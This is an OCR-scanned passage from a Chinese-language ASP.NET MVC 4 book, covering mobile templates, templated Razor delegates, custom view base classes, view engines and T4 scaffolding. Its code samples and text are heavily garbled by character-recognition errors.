以 .WinPhone.cshtml 结尾 的 视图 ， 只 要 满足 上 下 文 条 件 ， 痢 会 选择 这 些 视图 。 

上 下 文 条 件 不 局 限于 检查 浏览 句 的 用 户 代 理 ; 并 个 要求 使 用 请 求 上 下 文 做 任何 处 理 。 
我 们 可 以 根据 用 户 cookie, 决定 用 户 账户 类 型 的 数据 库 查询 或 日 期 来 创建 不 同 的 显示 模式 ， 
这 完全 取决 于 我 们 目 己 。 

显示 模式 使 得 重 写 移动 浏览 费 视 图 变 得 极其 简单 ， 但 如 果 创 建 只 针对 移动 浏览 费 使 用 
的 应 用 程序 ， 该 怎么 办 呢 ? 这 种 情况 下 ， 应 该 使 用 下 面 介绍 的 Mobile Site 模板 来 创建 新 应 
用 程序 。 

15.1.3 Mobile Project 模板 


Mobile Project 模板 为 我 们 创建 的 网 站 预先 配置 使 用 jQuery Mobile 库 。jQuery Mobile 
为 移动 Web 应 用 程序 提供 了 大 量 增 强 功 能 : 

e 用 户 界 面 采 用 触摸 优化 的 UI 小 部 件 ， 确 保 用 户 不 会 因为 小 尺寸 按钮 和 表单 字段 而 

泪 谍 。 

e 为 主要 的 移动 浏览 器 而 设计 ， 并 通过 测试 。 

e Ajax 导航 提供 了 动画 页 面 过 渡 ， 使 其 在 低 市 宽 的 情况 下 ， 依 然 能 保持 展 好 的 性 能 。 

e 通过 主题 支持 ， 我 们 可 以 使 用 CSS 主题 重 置 整个 网 站 的 皮肤 。 

e 列表 视图 使 用 移动 友好 的 接口 ， 为 浏览 和 操纵 信息 列表 提供 了 很 好 的 用 户 体验 。 
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使 用 Mobile Project 模板 创建 项 目 ， 运 行 项 目 ， 在 移动 模拟 右 中 浏览 项 目 ， 如 图 15-7 
所 示 。 这 样 我 们 可 以 快速 学 习 Mobile Project 模板。 


从 Login Home Page 


Modify this template to 
kick-start your ASP.NET 
MVC application. 


To leam more about ASP.NET MYC visit 
J yr 


色 13-7 


Mobile Project 模板 让 我 们 开始 开发 强大 的 jQuery Mobile ASPNET MVC 应 用 程序 ,为 
了 深入 地 学 习 开 发 ， 我 们 需要 了 解 jQuery Mobile。 但 这 超出 了 本 书 的 讨论 范围 ， 下 面 的 资 
料 可 供 参考 学 习 : 

se jQuery Mobile 网 站 (http://jquerymobile.com/) 提 供 了 大 量 资料 ， 其 中 包括 文档 、 演 示 

示例 和 主题 构建 文 持 等 。 
e。 ASPNET 网 站 上 的 ASPNET MVC 4 Mobile Features 教程 详细 地 介绍 了 如 何 构建 移 
动 会 议 网 站 ， 提 供 了 构建 完整 应 用 程序 的 资源 。 如 果 需 要 ， 可 以 下 载运 行 ， 下 载 网 
址 http://www.asp.net/mve/tutorials/mve-4/aspnet-mvc-4-mobile-features。 

e 从 2012 年 NDC(http://vimeo.com/43624503) 开 始 ，K. Scott Allen 的 ASPNET MVC 
和 jQuery Mobile 演示 加 MVC Music Store 例子 中 添加 了 jQuery Mobile 文 持 。 他 展 
示 了 一 些 高 级 特性 ， 如 页 面 事件 和 触摸 手势 支持 。 

MVC 4 为 我 们 提供 了 大 量 工 具 来 改善 移动 浏览 器 上 的 用 户 体验 。 笔者 的 建议 是 养 成 在 
移动 浏览 颖 测试 网 站 的 习惯 。 当 在 移动 浏览 右上 浏览 ASPNET 网 站 人 http:/Wasp.neb 时 ， 我 们 
会 发 现 浏 览 网 站 、 赔 读 网 站 内 容 非常 困难 。 我 们 通过 适应 性 呈现 可 以 极 大 地 改善 网 站 用 户 
的 体验 ， 获 得 移动 访问 量 的 剧 增 。 


第 15 章 高 级 主题 
15.2 ”高 级 Razor 


第 3 章 重 点 介绍 了 在 日 常 工作 中 可 能 用 到 的 Razor 功能 。 此 外 ，Razor 还 文 持 一 些 附 
加 功能 ， 尽 管 有 点 复杂 ， 但 是 这 些 功 能 很 强大 ， 所 以 很 值得 我 们 学 习 。 


15.2.1 模板 化 的 Razor 委托 


在 有 关 Razor 布局 的 讨论 中 ， 我 们 看 到 一 种 为 要 求 样板 代码 的 可 选 布局 部 分 提供 默认 
内 容 的 方法 。 当 时 提 到 了 使 用 称 为 模板 化 Razor 委托 (Templated Razor Delegate) 的 特性 来 创 
建 一 个 更 好 的 方案 。 

Razor 可 以 把 内 藤 的 Razor 模板 转换 成 委托 。 下 面 的 代码 融 展 示 了 一 个 这 样 的 示例 : 

@{ 

Eunc<dynamic，ob]ject> strongTemplate = @<strong>@item</strong>; 

} 

使 用 Razor 模板 生成 的 委托 是 Func<T，HelperResult> 类 型 。 在 前 面 的 例子 中 ， 类 型 T 
是 dynamic。 模 板 中 的 @item 参数 是 一 个 特殊 的 神奇 参数 。 尽 管 这 些 委 托 只 能 有 一 个 这 样 
的 参数 ， 但 模板 可 以 根据 需要 多 次 引用 和 它 。 

转换 完毕 后 ， 就 可 以 在 Razor 视图 的 任何 位 置 使 用 该 委托 了 : 

<dliv> 


QstrongTemplate ("This is bolded.") 
</div> 


这 样 做 的 结果 是 ， 我 们 可 以 编写 一 个 接收 Razor 模板 作为 参数 值 的 方法 ， 而 只 需要 使 
相应 参数 的 类 型 是 Func<T, HelperResul 人 即 可 。 
回 到 第 3 章 布 局 示例 中 的 RenderSection 示例 ， 我 们 编写 如 下 代码 : 


public static class RazorLayoutHelpers | 
public static HelperResult RenderSectionl 
this WebPageBase webPage, 
string name, 
Func<dynamic, HelperResult> defaultcContents) { 
if (webPage.IssectionDefined(name)) { 
return webPage.RenderSection (name); 
} 
return defaultcContents (null); 
} 
} 


上 和 耐 编 写 的 方法 接收 一 个 节点 (section) 名 称 和 一 个 Func<dynamic, HelperResult> 类 型 的 
对 象 。 因 此 ， 可 以 在 Razor 视图 中 对 该 方法 采用 如 下 形式 的 调用 : 
<footer> 


Qthis.RenderSectionl("Footer", (i<span>This is the default.</span>) 
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</footer> 


请 注意 ， 我 们 使 用 一 小 段 Razor 代码 把 默认 内 容 作为 参数 传递 进 了 方法 中 。 此 外 ， 还 
应 注意 上 面 的 代码 中 使 用 this 参数 来 调用 扩展 方法 RenderSection 。 

当 使 用 该 类 型 中 某 个 类 型 (或 该 类 型 的 派生 类 型 ) 的 扩展 方法 时 ， 必 须 使 用 this 参数 来 
调用 该 扩展 方法 。 当 编写 视图 时 ， 尽 管 在 类 中 编写 代码 不 太 明 显 ， 但 我 们 确实 需要 。 下 一 
小 节 将 会 对 此 做 出 解释 ， 并 提供 一 个 例子 来 梳理 RenderSection 的 用 法 。 


15.2.2 视图 编译 


与 许多 模板 引擎 或 视图 解释 引擎 不 同 的 是 ，Razor 视图 在 运行 时 动态 编译 成 类 ， 然 后 
执行 。 编 译 在 视图 第 一 次 被 请 求 时 发 生 ， 这 会 引发 轻微 的 一 次 性 性 能 开销 ， 但 这 样 做 的 好 
处 是 当 视 图 再 次 被 请 求 时 ， 它 就 可 以 完全 运行 编译 后 的 代码 ， 而 不 用 再 进行 重新 编译 。 如 
果 视 图 内 容 发 生 改 变 ，ASPNET 就 会 自动 重新 编译 该 视图 。 

正如 在 上 一 节 中 提 到 的 , 由 视图 编译 生成 的 类 派生 于 WebViewPage 类 , 而 WebViewPage 
类 是 WebPageBase 类 的 子 类 。 对 于 长 期 使 用 ASPNET 的 开发 人 员 对 这 一 点 不 应 该 感到 惊 
讶 ， 因 为 这 与 ASPNET Web Forms 页 面 使 用 其 Page 基 类 的 工作 机 制 类 似 。 

我 们 可 以 把 Razor 视图 的 基 类 修改 为 一 个 目 定义 类 ， 从 而 实现 回 视 网 中 添加 目 定义 的 
方法 和 属性 。Razor 视图 的 基 类 在 Views 目录 下 的 Web.config 文件 中 定义 。 下 面 代码 中 ， 
Web.config 文件 中 的 节点 包含 有 Razor 配置 : 

<Ssystem.web.webPages .razZor> 

<host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, 
System.Web.Mvc, Version=3.0.0.0, 
Culture=neutral, PublicKeyToken=31BF3856AD364E35"™ /> 
<pages pageBaseType="System.Web.Mvc .WebViewPage'"> 
<namespaces> 
<add namespace="System.Web.Mvc"™" /> 
<add namespace="System.Web.Mvc.Ajax™ /> 
<add namespace="System.Web.Mvc.Html™" /> 
<add namespace="System.Web.Routing" /> 
</namespaces> 
</pages> 
</system.web.webPpages.razZor> 


注意 <pages> 元 素 ， 它 的 pageBaseType 特性 值 指定 了 应 用 程序 中 所 有 Razor 视图 的 基 
本 页 面 类 型 。 但 是 我 们 可 以 用 上 自 定义 的 基 类 替换 该 特性 值 。 为 了 演示 如 何 替 换 ， 下 和 面 编写 
-个 派生 于 WebViewPaege 的 类 。 
我 们 只 需要 癌 CustomWebViewPage 类 中 湛 加 RenderSection 方法 的 一 个 重 载 版 本 : 
Using System; 


usSing System.Web.Mvc; 
Uslng System.Web.WebPages; 


public abstract class CustomWebVijewPage<T> : WebVviewPage<T> | 
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public HelperResult RenderSection(string name, Func<dynamic, 
HelperResult> 
defaultContents) { 
if (IsSectionDefined(name}) I{ 
return RenderSection (name); 
} 


return defaultContents (null).; 


} 


请 注意 上 面 定义 的 CustomWebViewPage 类 是 泛 型 类 型 .这 对 于 强 类 型 视图 的 文 持 非常 
重要 。 事 实 上 ， 所 有 的 视图 都 是 泛 型 类 型 。 当 不 指定 类 型 时 ， 它 的 类 型 就 是 dynamic。 
编写 完 CustomWebViewPage 类 之 后 ， 还 需要 在 Web.config 文件 中 修改 基本 页 面 类 型 : 


<pages pageBaseType="CustomWebViewPage"> 


修改 完毕 后 ， 应 用 程序 中 所 有 的 Razor 视图 将 都 派生 于 CustomWebViewPage<T> 类 ， 
并 且 拥 有 新 的 RenderSection 重 载 方法 ， 从 而 可 以 在 不 要 求 this 关键 字 的 情况 下 ,使 用 默认 
内 容 定义 可 选 布 局 节点 : 

<footer> 


QRendersSsection("Footer", Q@<span>This is the default.</span>) 
</footer> 


注意 为 了 看 到 这 些 代 码 和 操作 布局 ， 可 使 用 NuGet 将 Wrox.ProMvc4. 
Views.BasePageType 包 安 装 到 默认 ASPNETMVC 4 项目 中 ， 命 令 如 下 : 


Install~-Package WIrox.ProMvc4 .VIews .BasePageIYPpPe 


安 角 完毕 后 ， 需 要 在 Views 目录 下 的 Web.config 文件 中 把 基本 页 面 类 型 
改 成 , CustomWebViewPasge。 

Views 目录 中 的 example 文件 夹 包含 一 个 使 用 刚才 实现 方法 的 布局 示例 。 
按 Ctrl+F5 快捷 键 ， 查 看 下 面 两 个 URL 下 的 操作 代码 : 

® /example/layoutsample 


® /example/layoutsamplemissinefooter 


15.3 ”高 级 视图 引擎 


Microsoft 社区 程序 经 理 Scott Hanselman 喜欢 把 视图 引擎 称 作 “只 是 一 个 尖 括 号 生成 
峰 ”。 简 而 言 之 , 的 确 如 此 。 视图 引擎 把 内 存 中 存储 的 视图 表示 转换 成 我 们 想 要 的 任何 格式 。 
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通常 情况 下 ， 我 们 创建 的 是 包含 标记 和 脚本 的 cshtml 文件 。ASPNET MVC 的 默认 视图 引 
擎 实现 RazorViewEngine 利用 一 些 已 有 的 ASPNET API 把 我 们 的 页 面 泻 染 成 HTML。 
视图 引擎 不 局 限于 使 用 cshtml 页 面 ， 也 不 局 限于 泻 染 HIML。 后 面 会 看 到 ， 如 何 创建 
不 把 输出 演 染 成 HTML 的 视图 引擎 ， 以 及 需要 把 上 自 定义 领域 特定 语言 (domain-specific 
language 简写 DSL) 作 为 输入 的 不 同 寻 常 的 视图 引擎 。 
为 更 好 地 理解 视图 引擎 的 概念 ， 让 我 们 回顾 一 下 ASPNET MVC 生命 周期 ， 人 简化 图 如 
图 15-8 所 示 。 


HTTP : : N 和 
Controller »7 ViewResult 9 vowingn ee 7 


图 15-8 


还 有 许多 子 系统 都 在 图 15-8 中 没有 显示 出 来 。 这 个 图 只 是 为 了 说 明 什 么 阶段 引入 了 视 
图 引擎 一 一 正好 在 Controller 操作 执行 完毕 , 返回 一 个 ViewResult 作为 对 请 求 的 响应 之 后 。 
这 里 请 注意 ， 控 制 器 本 身 不 泻 染 视图 ， 它 只 是 准备 数据 (也 就 是 模型 )， 通 过 返回 的 
ViewResult 实例 ， 决 定 显示 哪个 视图 。 正 如 本 章 前 面 介 绍 的 ，Controller 基 类 中 包含 一 个 名 
为 View 的 简便 方法 ， 用 来 返回 ViewResult。 在 底层 ，ViewResult 调用 当前 视图 引擎 演 染 
视图 。 
15.3.1 视图 引擎 配置 


正如 刚才 提 到 的 ,为 应 用 程序 注册 备用 视图 引擎 是 可 以 实现 的 。 在 Globalasax.cs 文件 
中 配置 视图 引擎 。 默 认 情 况 下， 如 果 坚 持 继 续 使 用 RazorViewEngine 和 另外 一 个 默认 注册 
的 视图 引擎 WebFormViewEngine， 就 没 必 要 注册 其 他 视图 引擎 。 

然而 ， 如 果 想 使 用 其 他 视图 引擎 奉 换 这 些 默 认 注 册 的 视图 引擎 ， 我 们 可 以 在 
Application Start 方法 中 编写 如 下 代码 : 


protected vold Application Start() 1{ 
ViewEngines.Engines.Clear (); 
ViewEngines.Engines.Add (new MyVilewEngine ()); 
//other startup registration here 


} 

视图 引擎 是 一 个 静态 的 ViewEngineCollection 类 型 对 象 ， 可 以 包含 所 有 已 注册 的 视图 
引擎 。 这 是 注册 视 几 引擎 的 入 口 点 。 由 于 RazorViewEnegine 和 WebFormViewEngine 默认 包 
舍 在 视图 引擎 集合 中 ， 因 此 ， 我 们 需要 首先 调用 Clear 方法 。 如 果 想 把 添加 的 目 定 义 视 钨 
引擎 作为 除了 默认 引擎 外 的 另 一 个 选项 ， 而 不 是 奉 换 默认 的 视图 引擎 ， 我 们 束 不 需要 调用 
Clear 方法 。 

然而 ， 在 大 多 数 情 况 下 ， 我 们 不 需要 手动 注册 视图 引擎 (如 果 能 够 在 NuGet 上 获取 的 
话 )。 例 如 ， 创 建 默认 的 ASPNET MVC 4 项 目 之 后 ， 为 了 使 用 Spark 视图 引擎 ， 只 需 运 行 
NuGet 命令 Install-Package Spark.Web.Mvc。 
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这 样 束 会 在 我 们 的 项 目 中 添加 和 配置 Spark 视图 引擎 。 通 过 把 Index.cshtml 重 命名 为 
Index.spark， 我 们 可 以 快速 地 查看 到 效果 。 参 照 下 面 代 码 修 改 代码 ， 以 显示 控制 嚣 中 定义 
的 消息 : 


<IDOCTYPE htm]> 
<html> 
<head> 
<title>spark Demo</title> 
</head> 
<body> 
<hl if="!String.IsNullorEmpty (ViewBag.Message) ">s{ViewBag.Message}</hl> 
<p> 
This is a spark view. 
</p> 
</body> 
</html> 


上 面 的 代码 展示 了 一 个 非 营 简单 的 Spark 视图 示例 。 请 注意 上 面 的 让 特性 ， 其 中 包含 
了 一 个 决定 元 素 是 否 显示 的 Boolean 表达 式 。 这 个 控制 标记 输出 的 声明 方法 是 Spark 的 
个 标志 特点 。 


15.3.2 ”查找 视图 
当 创 建 自 定义 视图 引擎 时 ，IViewEngine 接口 是 需要 实现 的 关键 接口 。 


public interface IViewEngine 1{ 
ViewEngineResult FindPartialView (Controllercontext controllerContext, 
string partialViewName, bool useCache); 
ViewEngineResult FindView(ControllerContext controllerContext, string 
viewName, string masterName, bool UseCache) : 
VOIld ReleaseView(ControllerContext controllerContext, IView view),; 


} 

FindView 方法 人 迄 代 ViewEngineCollection 中 注册 的 视图 引擎 ， 并 在 每 个 视图 引擎 上 调 
用 FindView 方法 ， 并 把 视图 名 称 作为 参数 传 入 。 这 就 是 ViewEngineCollection 询问 每 个 视 
图 引擎 能 否 演 染指 定 视 图 的 方式 。 

FindView 方法 返回 一 个 ViewEngineResult 实例 ， 其 中 封装 了 问题 
能 泻 染 这 个 视图 吗 ” 一 一 的 答案 ， 如 表 15-1。 


表 15-1 ViewEngineResult 属性 


“当前 视图 引擎 


属 性 描 述 
View 返回 得 找 的 指定 视图 名 称 的 IView 实例 。 如 果 找 不 到 对 应 名 称 的 视图 ， 就 返回 
null 
ViewEneine 如 果 找 到 视图 ， 返 回 一 个 IViewEngine 实例 ;否则 返回 null 


SearchedLocations | 返回 一 个 IEnumerable<string>， 其 中 包含 视图 引擎 搜索 的 所 有 位 置 
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如 果 人 返回 的 IView 是 noll， 视 图 引擎 就 找 不 到 视图 名 称 对 应 的 视图 。 当 视图 引擎 找 不 
到 视图 时 ， 它 会 返回 它 查 找 的 位 置 列表 。 通常 情况 下 ,虽然 对 于 使 用 模板 文件 的 视图 引擎 ， 
这 些 位 置 是 文件 路 径 ， 但 它们 也 可 以 完全 是 别 的 路 笃 ， 比 如 数据 库 位 置 ， 对 于 把 视图 存储 
在 数据 库 中 的 视图 引擎 。 对 于 MVC 本 身 ， 这 些 位 置 字符 串 是 不 透明 的 : MVC 只 是 使 用 这 
些 位 置 字 符 串 癌 开 发 人 员 显 示 一 个 有 帮助 的 错误 信息 。 

FindPartialView 方法 的 工作 机 制 与 FindView 几乎 一 样 ， 除 了 它 关注 于 查找 部 分 视图 。 
通常 情况 下 ， 视 图 引擎 区 别 对 等 视图 和 部 分 视图 。 例 如 ， 亲 有 照 约定 ， 一 些 视图 目 动 同 当 前 
视图 添加 一 个 母 版 视图 或 布局 。 视 图 引擎 知道 它 查 找 的 是 完全 视图 还 是 部 分 视图 非常 重要 ; 
否则， 每 个 部 分 视图 都 会 被 一 个 母 版 布局 环绕 。 


15.3.3 ”视图 本 身 


当 创 建 目 定义 视图 引擎 时 ，IView 接口 是 我 们 需要 实现 的 第 二 个 接口 。 可 玛 的 是 ， 这 
个 接口 非常 简单 ， 只 包括 一 个 方法 : 


public interface IView | 


VOld Render (VijewContext viewContext, TextWriter writer); 


上 
目 定 义 视图 提供 了 一 个 ViewContext 实例 和 TextWriter 实例 , 其 中 ViewContext 中 包含 
了 自 定义 视图 引擎 需要 的 信息 。 视 图 引擎 首先 期 望 视图 使 用 ViewContext 中 的 数据 ， 比 如 


视图 数据 和 模型 ， 然 后 调用 TextWriter 实例 中 的 方法 来 呈现 输出 。 


表 15-2 列举 了 ViewContext 的 属性 。 


表 15-2 ViewContext 属性 


属 性 措 述 

HttpContext 一 个 HttpContextBase 的 实例 ， 可 以 用 来 访问 ASP.NET 内 部 对 象 ， 
比如 Server、Session、Request 和 Response 

Controller 一 个 ControllerBase 的 实例 ， 可 以 用 来 访问 控制 器 ， 调 用 视图 引擎 

RouteData 一 个 RouteData 的 实例 ， 可 以 用 来 访问 当前 请 求 的 路 由 值 

ViewData 一 个 ViewDataDictionary 实例 ， 其 中 包含 控制 器 传递 给 视图 的 数据 

TempData 一 个 TempDataDictionary 的 实例 ,其 中 包含 (一 个 特定 请 求 缓存 中 的 ) 
控制 器 传递 给 视图 的 数据 

View 一 个 IView 的 实例 ， 表 示 将 要 呈现 的 视图 

ClientValidationEnabled 一 个 Boolean 类 型 什 ， 表 示 视 图 的 客户 端 验 证 是 否 月 用 

FormContext 包含 在 客户 端 验证 中 使 用 的 表单 信息 

FormIdGenerator 允许 我 们 重 写 表单 的 命名 方式 ， 默 认 形 式 为 “form0” 

IsChildAction 一 个 Boolean 类 型 值 ， 表 明 操 作 是 否 作为 调用 HtmlLAction 或 
Html.RenderAction 的 结果 显示 

ParentActionViewContext 当 IsChildAction 等 于 true 时 ， 包 含 当 前 视图 父 视图 的 ViewContext 
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( 续 表 ) 
Writer 当 HIML 辅助 方法 不 返回 字符 串 时 ，HtmlTextWriter 使 用 它 ， 以 便 
与 非 Web Forms 视图 引擎 保持 兼容 
UnobtrusiveJavaScriptEnabled 这 个 属性 决定 用 户 客 户 问 验 证 的 非 侵入 式 方 法 和 Ajax 是 否 使 用 。 当 
属性 值 为 true 时 ,辅助 方法 不 同 标 记 中 输出 脚本 块 ,而 是 输出 HIML 
5 data-* 特 性 ， 非 入 侵 式 脚 本 使 用 该 特性 作为 同 标 记 附 加 行为 的 方式 


并 非 每 个 视图 呈现 时 都 需要 访问 所 有 这 些 属性 ， 但 技 多 不 压 身 ， 使 用 时 知道 它们 在 何 
处 还 是 很 好 的 。 
15.3.4 ”备用 视图 引擎 


当 首 次 使 用 ASPNET MVC 时 ， 我 们 可 能 想 使 用 ASPNET MVC 目 币 的 视图 引擎 : 
RazorViewEngine。 这 样 做 具有 诸多 优势 ， 有 具体 如 下 : 


。 默认 
。 简洁 轻 量 的 语法 
。 布局 


e 默认 HTML 编码 

e 文 持 C#/VB 脚本 

e 县 有 Visual Studio 中 的 智能 感知 功能 

然而 ， 也 有 很 多 次 ， 我 们 可 能 想 使 用 一 个 不 同 的 视图 引擎 一 一 例如 ， 当 我 们 ; 

se 想 使 用 不 同 的 语言 ， 比 如 Ruby 或 Python 

e 演 染 非 HIML 格式 的 输出 ， 比 如 图 形 、PDF 和 RSS 等 

e 拥有 使 用 另 一 种 格式 的 遗留 模板 

在 编写 本 段 时 ， 已 经 可 以 获取 一 些 第 三 方 视图 引擎。 表 15-3 列举 了 一 些 较 知 名 的 视图 
引擎， 但 也 存在 许多 其 他 我 们 没有 听 过 的 视图 引擎 。 


表 15-3 视图 引擎 属性 
视图 引擎 描 述 

Spark Spark(http://sparkviewenegine.com 站 是 Louis DeJardin( 现 在 是 微软 员工 ) 的 作品 ， 主 
要 开发 用 于 支持 MonoRail 和 ASPNET MVC。Spark 是 值得 注意 的 ， 因 为 它 使 用 
声明 式 语法 演 染 视图 ， 使 得 标记 和 代码 之 间 的 界限 变 得 模糊 。Spark 继续 添加 单 
新 的 功能 ， 其 中 包括 最 近 对 Jade 模板 语言 (最 先 在 Node.js 上 普及 ) 的 支持 

NHaml NHaml( 托 管 在 GitHub 上 , 网 址 https://github.com/NHaml/NHaml) 由 Andrew Peters 
在 2007 年 12 月 创建 ， 并 发 布 在 他 的 博客 上 ， 是 流行 的 Ruby on Rails Haml 视图 
引擎 的 一 个 端口 。DHaml 是 一 个 非常 简洁 的 DSL， 可 以 使 用 最 少 的 字符 描述 
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视图 引擎 


Brail 


StrngTemplate 


NVelocity 


Nustache 


NDlango 


Parrot 


( 续 表 ) 

朱 述 
Brail(MvcContrib 项 目的 一 部 分 ,http:/mvccontrib.org) 有 趣 的 是 它 使 用 Boo 语言 。 
Boo 是 一 种 面 回 对 象 的 静态 类 型 语言 ， 因 为 CLR 带 有 Python 语言 风格 ， 比 如 有 
意义 的 空白 
StringTemplate 是 一 个 轻 量 级 的 模板 引擎 (托管 在 Google 代码 ，http://code.google. 
com/p/string-template-view-engine-mvc), 它 基 于 Java StrineTemplate 引擎 解释 执行 
而 非 编译 执 行 
NVelocity(http://www.castleproject.org/others/nvelocity) 是 一 个 开源 模板 引擎 。 它 为 基 
于 Java 的 应 用 程序 创建 ,是 Apache/Jakarta Velocity 项 目的 端口 。 前 几 年 NVelocity 
项 目 做 得 一 直 很 不 错 ， 直 到 2004 年 ， 检 得 插件 停止 ， 项 目 进度 放 缓 
Nustache(https://github.conyjdiamond/Nustache) 是 流行 的 Mustache 模板 语言 
的 .NET 实现 ， 如 此 命名 ， 是 因为 它 使 用 花 插 号 ， 而 从 形状 上 看 ， 花 括号 像 竖 起 
来 的 胡子 。 由 于 Mustache 有 意 不 文 持 控制 流 语句 ， 因 此 它 被 称 为 是 一 个 缺少 逻 
辑 的 模板 系统 。Nustache 项 目 包括 一 个 MVC 视图 引擎 
NDjango(http://ndjango.ore/) 是 Django 模板 语言 在 .NET 平台 上 用 F# 语 言 实现 的 一 
个 版 本 
Parrot(http://thisisparrot.com) 是 一 个 有 趣 的 视图 引擎 , 拥有 CSS 视图 语法 , 能 够 很 
好 地 支持 枚 举 和 榜 套 对 和 象 ， 是 一 个 可 扩展 的 泻 染 系 统 


15.3.5 ”新 视图 引擎 还 是 新 ActionResult 


我 们 会 经 常 辜 到 这 样 的 问题 ， 是 创建 一 个 新 视图 还 是 创建 一 个 新 ActionResult 类 型 。 
例如 ， 我 们 想 返 回 一 个 目 定义 XML 格式 的 对 象 。 此 时 ， 我 们 应 该 编写 一 个 新 的 视图 引擎 ， 
还 是 创建 一 个 新 的 MyCustomXmlFormatActionResult 呢 ? 


在 一 个 与 男 一 个 之 间 做 出 选择 时 ， 


- 般 的 经 验 法 则 是 它 是 否 有 某 种 形式 的 模板 文件 对 


标记 泻 染 具 有 指导 意义 。 如 果 只 有 一 种 方法 能 把 对 象 转换 为 输出 格式 ， 那 么 编 与 目 定义 


ActionResult 类 型 会 更 有 意义 。 


例如 ，ASPNET MVC Framework 包括 的 JsonResult 可 以 用 来 把 一 个 对 象 序列 化 为 


JSON 语法 格式 。 通 常情 况 下， 只 有 一 种 方式 能 够 把 对 和 象 序 列 化 为 JSON。 根据 返回 的 操作 


方法 和 视图 ， 我 们 不 能 改变 同样 对 象 到 JSON 的 序列 化 。 序 列 化 过 程 一 般 不 能 通过 模板 


控制 。 


然而 ， 假 设 我 们 想 使 用 XSLT 把 XML 转换 成 HIML 。 依 据 调用 的 操作 ， 我 们 可 以 使 
用 多 种 方式 把 同样 的 XML 转换 成 HIML。 在 这 种 情况 下 ， 我 们 可 以 创建 一 个 使 用 XSLT 
文件 作为 视图 模板 的 XsltViewEngine。 
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15.4 高 级 基 架 


第 4 章 综述 了 基 架 视图 在 MVC 4 中 的 用 法 ， 这 个 特性 使 得 创建 控制 器 和 视图 变 得 容 
易 ， 我 们 只 需要 在 Add Controller 对 话 框 中 设置 相应 选项 就 可 以 实现 创建 、 读 取 、 更 新 和 
删除 功能 。 正 如 第 4 章 中 提 到 的 ， 基 架 系统 是 可 扩展 的 。 本 节 介绍 了 扩展 默认 基 架 系统 的 
- 些 方法 。 
15.4.1 自 定义 T4 代码 模板 


T4 模板 是 一 个 集成 到 Visual Studio 中 的 代码 生成 费 引 擎 ,， 它 增强 了 ASPNET MVC 所 
供 的 默认 基 架 功能 ,假设 Visual Studio 的 安装 目录 是 C:\Program Files (x86)NMicrosoft Visual 
Studio 10.0\， 可 在 下 面 的 位 置 碍 找 这 些 模板 : 

e C:\Program Files (X86)NMacrosott Visual Studio 11.0\Common7NDE' 

ItemTemplates\ CSharp\Web\MVC 4\CodeTemplates AddController 
® C:\Proeram Files (x86)\Microsotft Visual Studio 11.0\CommonN\IDE\ 
ItemTemplates\CSharp\Web\MVC 4A\CodeTemplates\AddView 

ASPNET MVC 首先 查找 项 目 中 的 CodeTemplates 文件 夹 ， 因 此， 如 果 需 要 自 定义 新 控 
制 顷 ， 我 们 可 以 直接 把 CodeTemplates 文件 夹 复制 到 项 目的 根 目录 下 ， 并 回 其 中 添加 目 定 
义 的 T4 模板 。 

Visual Studio 会 给 出 一 下 信息 : 

编译 转换 ; 找 不 到 名 为 MvcTextTemplateHost 的 类 型 或 名 称 空间 ， 是 不 是 缺少 了 using 命令 或 
者 程序 集 引 用 ? 

这 样 做 的 原因 是 ， 当 加 项 目 中 添加 T4 文件 时 ，Visual Studio 把 每 一 个 模板 的 Custom 
Tool 属性 值 设置 为 TextTemplatingFileGenerator。 对 于 一 个 独立 的 T4 文件 ， 这 就 是 我 们 想 
要 的 。 但 在 视图 基 架 的 情况 下 ， 这 个 值 就 是 不 正确 的 。 要 解决 这 问题 ， 选 择 所 有 的 T4 文 
件 ， 清 空 Properties 窗口 中 的 Custom Tool 属性 ， 如 图 15-9 所 示 。 

更 好 的 是 ， 可 在 项 日 中 安装 NuGet 包 Mvc4CodeTemplatesCSharp (或 在 Visual Basic 中 
安装 Mvc4CodeTemplatesVB 包 )。 这 样 就 把 模板 复制 到 了 项 目 中 ;这 样 也 为 这 些 文件 正确 
地 设置 了 Build Action 属性 ， 以 便 打 开 这 些 文件 时 ，Visual Studio 不 尝试 运行 这 些 文件 。 

Add View 对 话 框 在 项 目 中 会 给 视图 基 架 T4 模板 较 高 的 优先 级 (相对 于 同名 的 默认 模 
板 )。 我 们 也 可 以 给 一 些 模板 指定 新 名 称 。Add View 对 话 框 会 在 Scaffold Template 下 拉 框 中 
显示 新 模板 选项 。 
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solution Explorer -xx| 
省 -8 
Search Solution Explorer (Ctrle:) Pr:| 


a 可 | CodeTemplates 
a 全 AddView 
4 全 CS5HTML 
国 Create.tt 
Deletett 
国 Details.tt 
Edittt 
B Empty.tt 
b 国 List,tt 
b 国 Centent 


本 


Solution Explorer Server Explorer | 
Properties -时 


| 力 吕 
| 回 Advanced 
Browse to URL 
Builld Action Content 
Copy te Output Directory De net copy | 
TeaTemplatingFileG | 
Custom Tool Namespace 
日 Misc 
File Name 
| 南面 下 ah 
Custom Tool 
Specifies the tool that transforms a file at design time and places 
the output of that transformation mto another file. For erample, … | 


图 15-9 
代码 模板 与 辅助 方法 模板 
我 们 很 容易 把 这 些 模板 和 ASPNET MVC 视图 使 用 的 辅助 方法 模板 相 混 淆 。 本 章 后 面 
“模板 ”一 节 中 讨论 的 Editor 和 Display 模板 主要 用 来 显示 视图 中 的 模型 信息 ， 而 本 节 讨 
论 的 T4 模板 是 在 向 项 目 中 添加 新 的 代码 项 时 ， 由 Visual Studio 使 用 。 我 们 可 以 把 前 者 看 
成 运行 时 (动态 ) 基 架 ， 而 把 后 者 看 成 设计 时 (静态 ) 基 架 。 
15.4.2 NuGet 包 MvcScaffolding 


尽管 可 以 使 用 前 一 节 介 绍 的 T4 方法 ， 但 是 NuGet 包 MvcScaffolding 大 大 提高 了 
ASPNET MVC 4 中 的 基 架 性 能 。 


Install-Package MvcScaftfolding 


尽管 这 个 包 由 ASPNET 团队 中 一 个 成 员 开 发 ， 但 它 不 是 Microsoft 产品 ， 也 不 受 官方 
支持 。 包 中 添加 了 一 些 强 大 的 基 架 特性 : 

e 问 Add Controller 对 话 杠 中 添加 了 一 些 更 高 级 别 的 模板 选项 。 

e 可 以 采用 基 架 命令 ， 该 基 架 使 用 了 包 管 理 器 控制 台 (Packager Manager Console) 中 的 
目 定 义 PowerShell 命令 。 

e 实现 创建 目 定 义 基 架 器 (scaffoldem) 的 目 动 化 。 

e 更 新 速度 快 ， 由 于 它 是 NuGet 包 ， 因 此 开发 团队 可 以 在 ASPNET MVC 发 布 周期 
